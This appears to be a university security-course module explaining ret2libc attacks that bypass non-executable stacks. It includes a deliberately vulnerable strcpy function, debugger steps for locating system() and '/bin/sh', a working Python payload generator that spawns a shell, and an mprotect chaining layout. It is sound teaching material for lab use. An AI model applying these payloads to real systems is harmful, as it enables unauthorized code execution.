Code-Reuse Attacks: ret2libc

The previous module showed how to smash a stack buffer and redirect %eip to injected shellcode. Defenders responded with a hardware-assisted countermeasure: mark the stack segment non-executable (the NX bit on x86-64, or "DEP" — Data Execution Prevention — on Windows). When the CPU tries to fetch an instruction from a page whose execute-permission bit is clear, it raises a fault before a single attacker byte runs.

Game over for shellcode injection. But not for control-flow hijacking. Every process is already loaded with executable code it didn't write: the C standard library, libc. ret2libc exploits this by bending the overflow to return into existing library functions instead of injected bytes. No new code needed.

Why shellcode injection fails under NX

A modern Linux system with NX-enabled gcc (the default) marks the stack rw- — readable and writable, but not executable. When ret pops an attacker-supplied address that points into the stack, the CPU raises a general-protection fault because the stack page has no execute bit. The program crashes, but no shell runs.

Disabling NX for a specific binary (gcc -z execstack) re-enables the old attack. The lecture CTF labs do this intentionally to isolate each concept: shellcode only works with NX off; ret2libc works with NX on (but ASLR off). Understanding what each defense defeats — and what it doesn't — is the point.

Existing executable code: libc

Every dynamically linked C program maps libc.so into its address space at load time. Since libc is linked into almost every program, its functions are almost always present and executable. Two are especially useful to attackers:

Function	Signature	Why attackers want it
`system()`	`int system(const char *cmd)`	Runs a shell command; `system("/bin/sh")` spawns a shell
`mprotect()`	`int mprotect(void *addr, size_t len, int prot)`	Changes page permissions — can re-enable stack execution

These functions live in libc's executable text segment. The attacker does not inject them; they are simply already there and mapped into every victim process.

ASLR and why it matters

Address Space Layout Randomization (ASLR) randomizes where the stack (and optionally the heap and shared libraries) are loaded in memory on each run. Linux exposes three levels via kernel.randomize_va_space:

Level	Effect
`0`	No randomization — stack and heap at the same address every run
`1`	Stack randomized; heap base fixed
`2`	Both stack and heap randomized

Key insight: when ASLR is disabled (randomize_va_space=0), libc loads at the same base address every run. That makes system() and the embedded "/bin/sh" string findable at deterministic, unchanging addresses. The ret2libc lab exercises disable ASLR for exactly this reason. Defeating ASLR with ret2libc requires a separate information-leak step (covered later in the course).

The 32-bit calling convention: what system() expects

Before constructing the payload, understand how a normal 32-bit call system("/bin/sh") works. The call instruction:

Pushes the next instruction's address (saved return address) onto the stack.
Jumps to system.

At the moment system begins executing, the stack looks like this (high addresses at top):

  high address
  ┌──────────────────────┐
  │  xxxx (caller frame) │   ← above call site
  ├──────────────────────┤  %esp + 4   ← first arg: pointer to "/bin/sh"
  │  addr → "/bin/sh"    │
  ├──────────────────────┤  %esp       ← saved return address (pushed by call)
  │  saved ret addr      │
  └──────────────────────┘
  low address

system reads its argument from %esp + 4. The ret2libc trick is to fake this layout during the overflow so the stack looks exactly as if the program had called system("/bin/sh") legitimately.

ret site vs. call site

There is a subtle but important difference:

A call site encodes the target address directly in the call instruction.
A ret site reads the target address from the stack when ret executes.

In a ret2libc attack there is no call instruction — instead ret pops the attacker-supplied system() address into %eip. Because no call was executed, no return address was pushed onto the stack at that moment. This means the attacker must place both the fake return address and the argument manually in the payload, so that %esp lines up correctly when system starts executing.

Constructing the ret2libc payload

The vulnerable function is the familiar vul():

#define SIZE 64
int vul(char *input) {
    char buf[SIZE];
    strcpy(buf, input);   // no bounds check
    return 0;
}

Three sub-tasks are needed:

Task A — Find the address of system(). With ASLR off, pwndbg gives it directly:

pwndbg> p system
$3 = {<text variable, no debug info>} 0xf7dc7cd0 <system>

Task B — Find the address of the "/bin/sh" string. The string is embedded somewhere in libc (used internally by system). Search for it in pwndbg:

pwndbg> search "/bin/sh"
Searching for value: '/bin/sh'
libc.so.6    0xf7f390d5 '/bin/sh'

Task C — Lay out the overflow payload.

The payload must be written into buf from lower to higher address:

[ N bytes padding      ]  ← fill to the saved return address (find N with cyclic)
[ addr of system()     ]  ← 4 bytes, little-endian  — ret pops this into %eip
[ fake return addr     ]  ← 4 bytes — where system() "returns" (use exit() for a clean exit)
[ addr of "/bin/sh"    ]  ← 4 bytes — system()'s first argument

Stack state just before ret executes in vul():

  high address
  ┌─────────────────────┐
  │  addr → "/bin/sh"   │   ← system()'s arg  (esp+8 when system starts)
  ├─────────────────────┤
  │  fake_ret (exit())  │   ← system()'s saved ret  (esp+4 when system starts)
  ├─────────────────────┤
  │  addr of system()   │   ← vul()'s saved eip — ret pops this into %eip
  ├─────────────────────┤
  │  N bytes 'A'        │   ← padding over buf + saved ebp
  └─────────────────────┘
  low address

When vul() executes ret:

It pops addr_of_system into %eip — execution jumps to system.
system sees its saved return address at %esp and its first argument at %esp+4.
system("/bin/sh") spawns a shell.

A Python exploit script (modeled on the SEEDLab payload template from the lecture):

#!/usr/bin/env python3
import sys

content = bytearray(0xaa for i in range(300))  # fill with non-zero values

# Addresses found via GDB/pwndbg with ASLR disabled
system_addr = 0xf7dc7cd0   # Task A: p system
sh_addr     = 0xf7f390d5   # Task B: search "/bin/sh"
exit_addr   = 0xf7db4f80   # optional: p exit

# Task C: place addresses at the right offsets
# X = offset to saved eip (found with cyclic)
# Y = X + 4  (fake return address for system)
# Z = X + 8  (system's first argument)
X = 76   # example offset — find yours with cyclic
content[X:X+4]   = (system_addr).to_bytes(4, byteorder='little')
content[X+4:X+8] = (exit_addr).to_bytes(4, byteorder='little')
content[X+8:X+12]= (sh_addr).to_bytes(4, byteorder='little')

sys.stdout.buffer.write(content)

Chaining calls: mprotect() to re-enable the stack

Sometimes the goal is not just a shell but re-enabling stack execution so that injected shellcode can run — useful when system() is unavailable or restricted. The technique chains two libc calls:

Overflow → return into mprotect(stack_page, length, PROT_READ|PROT_WRITE|PROT_EXEC).
mprotect re-marks the stack page executable and returns.
Return address for mprotect points to the shellcode already sitting in the buffer.

The stack layout for a call with multiple arguments is the same idea extended:

  high address
  ┌──────────────────┐
  │  prot (7 = rwx)  │   ← mprotect arg 3
  ├──────────────────┤
  │  len             │   ← mprotect arg 2
  ├──────────────────┤
  │  addr to page    │   ← mprotect arg 1
  ├──────────────────┤
  │  saved ret       │   ← where mprotect returns (shellcode addr)
  ├──────────────────┤
  │  &mprotect()     │   ← vul()'s overwritten saved eip
  └──────────────────┘

Chaining two full functions like this is awkward because, after the first function returns, %esp has advanced past the fake call site and you need a way to "clean up" the arguments before the next function sees a correct stack. This difficulty motivates Return-Oriented Programming (ROP), which chains short instruction sequences ending in ret (gadgets) instead of whole functions — giving Turing-complete control without injecting a single byte.

PLT/GOT: calling libc through the binary

When GCC compiles a call to system(), it generates call system@plt. The Procedure Linkage Table (PLT) is a trampoline stub in the binary's own text; it reads the resolved libc address from the Global Offset Table (GOT) and jumps there. The dynamic linker fills the GOT at load time.

For ret2libc with ASLR off, attackers use the raw libc address (from p system in GDB), which bypasses the PLT entirely. Position-independent executables built with -fPIE always call through system@plt; understanding PLT/GOT explains why that stub exists and why its address is stable within a given binary even when libc's base changes.

Key takeaways

NX/DEP prevents executing injected bytes on the stack; it does not prevent hijacking the return address to point elsewhere.
ret2libc satisfies NX by redirecting control into already-executable library code — no injection needed.
The 32-bit cdecl convention passes arguments on the stack; the payload must place [system_addr][fake_ret][&"/bin/sh"] precisely above the overwritten return slot.
The ret site differs from a call site: no return address is pushed by a call, so the attacker must supply it manually in the payload.
ASLR makes finding libc addresses harder by randomizing the load base; disabling it (randomize_va_space=0) makes the lab tractable.
mprotect() can be used as a first hop to re-enable stack execution before jumping to shellcode — a direct precursor to ROP chains.
The next module (ROP) generalizes this idea: instead of whole functions, attackers chain tiny instruction sequences ("gadgets") ending in ret, enabling Turing-complete computation from existing code alone.